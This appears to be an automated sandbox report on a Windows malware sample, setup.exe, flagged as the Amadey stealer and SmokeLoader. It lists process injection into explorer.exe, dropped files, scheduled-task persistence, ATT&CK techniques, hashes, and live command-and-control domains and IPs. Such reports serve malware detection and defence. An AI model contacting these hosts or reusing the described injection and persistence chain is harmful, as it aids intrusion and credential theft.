Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_04900D8D rdtsc

0_2_04900D8D

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_0026645B mov eax, dword ptr fs:[00000030h]	7_2_0026645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_0026A1C2 mov eax, dword ptr fs:[00000030h]	7_2_0026A1C2
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_0248366F push dword ptr fs:[00000030h]	8_2_0248366F
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_025C092B mov eax, dword ptr fs:[00000030h]	8_2_025C092B
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_025C0D90 mov eax, dword ptr fs:[00000030h]	8_2_025C0D90
Source: C:\Users\user\AppData\Roaming\wsjctfw	Code function: 10_2_024935CF push dword ptr fs:[00000030h]	10_2_024935CF
Source: C:\Users\user\AppData\Roaming\wsjctfw	Code function: 10_2_0408092B mov eax, dword ptr fs:[00000030h]	10_2_0408092B
Source: C:\Users\user\AppData\Roaming\wsjctfw	Code function: 10_2_04080D90 mov eax, dword ptr fs:[00000030h]	10_2_04080D90

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: wsjctfw.9.dr

Jump to dropped file

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Thread created: C:\Windows\explorer.exe EIP: 3341988			Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw	Thread created: unknown EIP: 1231988			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000030001\2.exe "C:\Users\user\AppData\Local\Temp\1000030001\2.exe"			Jump to behavior

Source: explorer.exe, 00000009.00000000.2785361749.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: axplong.exe, axplong.exe, 00000007.00000002.3271989108.000000000041C000.00000040.00000001.01000000.00000007.sdmp, explorer.exe, 00000009.00000000.2781784756.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000009.00000000.2783192687.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2781784756.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000000.2781784756.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000009.00000000.2781784756.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000009.00000000.2781222412.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 7_2_0024D312 cpuid

7_2_0024D312

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000030001\2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000030001\2.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 7_2_0024CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

7_2_0024CB1A

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 7_2_002365B0 LookupAccountNameA,

7_2_002365B0

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 7.2.axplong.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.axplong.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.setup.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.axplong.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3271829557.0000000000231000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2066678423.0000000000761000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2055063157.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2095516685.0000000000231000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2025249873.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2662669127.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2064925770.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2105418070.0000000000231000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Yara detected SmokeLoader

Source: Yara match	File source: 0000000A.00000002.3042307011.00000000041F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2807434237.0000000003FB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2807261625.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3042208833.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 0000000A.00000002.3042307011.00000000041F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2807434237.0000000003FB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2807261625.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3042208833.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	212 Process Injection	21 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	351 Virtualization/Sandbox Evasion	LSASS Memory	1041 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	1 DLL Side-Loading	212 Process Injection	Security Account Manager	351 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Hidden Files and Directories	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	13 Software Packing	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	324 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
setup.exe	100%	Avira	TR/Crypt.TPM.Gen
setup.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Roaming\wsjctfw	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\2[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000030001\2.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://word.office.comon	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
http://yosoborno.com:80/tmp/3	0%	Avira URL Cloud	safe
http://nusdhj.ws/tmp/	0%	Avira URL Cloud	safe
http://185.215.113.16/Jo89Ku7d/index.phpTemp	100%	Avira URL Cloud	phishing
http://yosoborno.com/tmp/	0%	Avira URL Cloud	safe
http://185.215.113.16/Jo89Ku7d/index.php#	100%	Avira URL Cloud	phishing
https://atlpvt.com/	0%	Avira URL Cloud	safe
https://atlpvt.com/tmp/2.exe6mv	0%	Avira URL Cloud	safe
https://atlpvt.com/tmp/2.exe	0%	Avira URL Cloud	safe
https://outlook.com	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
http://crl.v	0%	URL Reputation	safe
https://atlpvt.com/tmp/2.exe(mh	0%	Avira URL Cloud	safe
http://wshcnsd.xyz/tmp/	0%	Avira URL Cloud	safe
http://185.215.113.16/Jo89Ku7d/index.php	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php?	100%	Avira URL Cloud	phishing
http://wshcnsd.xyz/	0%	Avira URL Cloud	safe
http://185.215.113.16/Jo89Ku7d/index.phpcoded	100%	Avira URL Cloud	phishing
http://nusdhj.ws:80/tmp//	0%	Avira URL Cloud	safe
http://nusdhj.ws/	0%	Avira URL Cloud	safe
http://185.215.113.16/Jo89Ku7d/index.php/	100%	Avira URL Cloud	malware
http://185.215.113.16/Jo89Ku7d/index.phpncoded	100%	Avira URL Cloud	phishing
https://wns.windows.com/)s	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
atlpvt.com	58.65.168.132	true	false	unknown
wshcnsd.xyz	unknown	unknown	true	unknown
yosoborno.com	unknown	unknown	true	unknown
nusdhj.ws	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://nusdhj.ws/tmp/	true	Avira URL Cloud: safe	unknown
https://atlpvt.com/tmp/2.exe	false	Avira URL Cloud: safe	unknown
http://yosoborno.com/tmp/	true	Avira URL Cloud: safe	unknown
http://wshcnsd.xyz/tmp/	true	Avira URL Cloud: safe	unknown
http://185.215.113.16/Jo89Ku7d/index.php	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://word.office.comon	explorer.exe, 00000009.00000000.2785361749.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000009.00000003.3096160513.000000000C85F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2790128261.000000000C81C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://atlpvt.com/tmp/2.exe6mv	axplong.exe, 00000007.00000002.3273525737.0000000001259000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://atlpvt.com/	axplong.exe, 00000007.00000002.3273525737.0000000001259000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/Jo89Ku7d/index.php#	axplong.exe, 00000007.00000002.3273525737.00000000012E5000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://powerpoint.office.comcember	explorer.exe, 00000009.00000000.2788512315.000000000C460000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://yosoborno.com:80/tmp/3	explorer.exe, 00000009.00000003.3095335436.0000000003531000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000009.00000000.2785361749.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/Jo89Ku7d/index.phpTemp	axplong.exe, 00000007.00000002.3273525737.0000000001288000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://schemas.micro	explorer.exe, 00000009.00000000.2784251852.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2784734519.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2784700716.0000000008870000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://outlook.com	explorer.exe, 00000009.00000000.2785361749.0000000009D42000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://atlpvt.com/tmp/2.exe(mh	axplong.exe, 00000007.00000002.3273525737.0000000001259000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/Jo89Ku7d/index.phpcoded	axplong.exe, 00000007.00000002.3273525737.00000000012E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://wshcnsd.xyz/	explorer.exe, 00000009.00000003.3094249555.000000000C908000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000009.00000000.2783388537.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/Jo89Ku7d/index.php?	axplong.exe, 00000007.00000002.3273525737.000000000121B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://nusdhj.ws:80/tmp//	explorer.exe, 00000009.00000003.3094249555.000000000C908000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000009.00000003.3096295760.000000000C513000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2788512315.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/	explorer.exe, 00000009.00000000.2785361749.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nusdhj.ws/	explorer.exe, 00000009.00000003.3094249555.000000000C908000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://crl.v	explorer.exe, 00000009.00000000.2781222412.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/Jo89Ku7d/index.php/	axplong.exe, 00000007.00000002.3273525737.00000000012E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncoded	axplong.exe, 00000007.00000002.3273525737.00000000012E5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://wns.windows.com/)s	explorer.exe, 00000009.00000000.2785361749.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
58.65.168.132	atlpvt.com	Pakistan		23674	NAYATEL-PKNayatelPvtLtdPK	false
185.215.113.16	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483208
Start date and time:	2024-07-26 20:56:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	setup.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/6@10/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target axplong.exe, PID 5272 because there are no executed function
Execution Graph export aborted for target axplong.exe, PID 5564 because there are no executed function
Execution Graph export aborted for target setup.exe, PID 5620 because it is empty
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: setup.exe

Simulations

Behavior and APIs

Time	Type	Description
14:58:01	API Interceptor	1565x Sleep call for process: axplong.exe modified
14:58:17	API Interceptor	261x Sleep call for process: explorer.exe modified
20:57:00	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
20:58:32	Task Scheduler	Run new task: Firefox Default Browser Agent B274CAF5317F72CD path: C:\Users\user\AppData\Roaming\wsjctfw

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
58.65.168.132	hsRju5CPK2.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRAT	Browse
185.215.113.16	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	EXyAlLKIck.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	PE1dBCFKZv.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	random.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NAYATEL-PKNayatelPvtLtdPK	FFAOL20240705.exe	Get hash	malicious	AgentTesla	Browse	203.82.48.116
	P-O_03072024.exe	Get hash	malicious	AgentTesla	Browse	203.82.48.116
	mfQABKHhh1.elf	Get hash	malicious	Mirai	Browse	115.186.147.57
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	124.109.39.28
	hsRju5CPK2.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRAT	Browse	58.65.168.132
	Pvq4zSr7yY.elf	Get hash	malicious	Unknown	Browse	124.109.51.225
	15k4cpuGzQ.elf	Get hash	malicious	Unknown	Browse	58.65.191.28
	https://ultimacommunications.com/cmc/roundcube/?email=rulescommittee_secretary@ao.uscourts.gov	Get hash	malicious	Unknown	Browse	203.82.48.218
	8blcHp1t06.exe	Get hash	malicious	AgentTesla	Browse	203.82.48.116
	vkGOmuEY6o.elf	Get hash	malicious	Mirai, Moobot	Browse	115.186.147.75
WHOLESALECONNECTIONSNL	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	RedLine	Browse	185.215.113.9
	file.exe	Get hash	malicious	RedLine	Browse	185.215.113.9
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.16
	SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Get hash	malicious	Amadey	Browse	185.215.113.19
	EXyAlLKIck.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse	185.215.113.16
	LbMTyCFRzs.exe	Get hash	malicious	Amadey	Browse	185.215.113.19

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	Vidar	Browse	58.65.168.132
	1lKbb2hF7fYToopfpmEvlyRN.exe	Get hash	malicious	LummaC, Vidar	Browse	58.65.168.132
	file.exe	Get hash	malicious	Vidar	Browse	58.65.168.132
	Monetary_Funding_Sheet_2024.js	Get hash	malicious	WSHRAT	Browse	58.65.168.132
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse	58.65.168.132
	88z6JBPo00.exe	Get hash	malicious	Unknown	Browse	58.65.168.132
	fJDG7S5OD7.exe	Get hash	malicious	Unknown	Browse	58.65.168.132
	Ku8UpPuzaa.exe	Get hash	malicious	Unknown	Browse	58.65.168.132
	BvPEdRRQNz.exe	Get hash	malicious	Unknown	Browse	58.65.168.132
	uTQkPZ9odT.exe	Get hash	malicious	Unknown	Browse	58.65.168.132

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	239616
Entropy (8bit):	5.775223239867257
Encrypted:	false
SSDEEP:	3072:wLCVEbyN72nmIGJWwJsoh/NtuFV+b877Lqvywr+o/gqMVIwWCe:vabyN7S1GJWg/vEV+Q3LPwioDMl
MD5:	E84A4D01A5798411ECEECA1F08E91AFB
SHA1:	709622D549935F42C3859D11AA5920C1782F32C1
SHA-256:	2F77A81B5D02BFC389B9DC7705FAD1AFFFCA1ADE7BE88AEB96A4630F50C02717
SHA-512:	9C933D40129AB75C67B6ADF29C049055EA58E2E571A4223C03177B3140F93545A8B3298C28D60BFBC86649C56467A2941B29349C4D94C78DA69F5CFADB66B73D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@g.s... ... ... kpQ ... kpd ... kpP `.. .~i ... ... v.. kpU ... kp` ... kpg ... Rich... ........PE..L.....yd............................. ............@..........................@......j...........................................x...................................\...................................@............................................text............................... ..`.rdata...2.......4..................@..@.data........0......................@....cus.........`......................@..@.rufaxu......p......................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000030001\2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	239616
Entropy (8bit):	5.775223239867257
Encrypted:	false
SSDEEP:	3072:wLCVEbyN72nmIGJWwJsoh/NtuFV+b877Lqvywr+o/gqMVIwWCe:vabyN7S1GJWg/vEV+Q3LPwioDMl
MD5:	E84A4D01A5798411ECEECA1F08E91AFB
SHA1:	709622D549935F42C3859D11AA5920C1782F32C1
SHA-256:	2F77A81B5D02BFC389B9DC7705FAD1AFFFCA1ADE7BE88AEB96A4630F50C02717
SHA-512:	9C933D40129AB75C67B6ADF29C049055EA58E2E571A4223C03177B3140F93545A8B3298C28D60BFBC86649C56467A2941B29349C4D94C78DA69F5CFADB66B73D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@g.s... ... ... kpQ ... kpd ... kpP `.. .~i ... ... v.. kpU ... kp` ... kpg ... Rich... ........PE..L.....yd............................. ............@..........................@......j...........................................x...................................\...................................@............................................text............................... ..`.rdata...2.......4..................@..@.data........0......................@....cus.........`......................@..@.rufaxu......p......................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Download File

Process:	C:\Users\user\Desktop\setup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1898496
Entropy (8bit):	7.950130111317579
Encrypted:	false
SSDEEP:	49152:5qE17IghRPKUd2LI/WYW+jNTxjgafw8TfzYBgx1ITA:5HdkRnSNTBg2/ug3WA
MD5:	8EF54B7689AF3A0FE5028BC42964BB26
SHA1:	DEBCB0EA69E4330873F281B0D9B34D15FC513ABC
SHA-256:	78305C8B5E8EAD6989A0AF09FC6ED8F2FF1B246C0487DFA78FB5B155B554CAE9
SHA-512:	8B2EE0C290A48F826BACAEAF949D7335B14F65DC8967D0BCB05AD386FDA9FAF5D6D016D66CE202CD7BE202EAF1981B6B17BB60DAE33DC085F28AAB9BE9D3986B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Reputation:	low
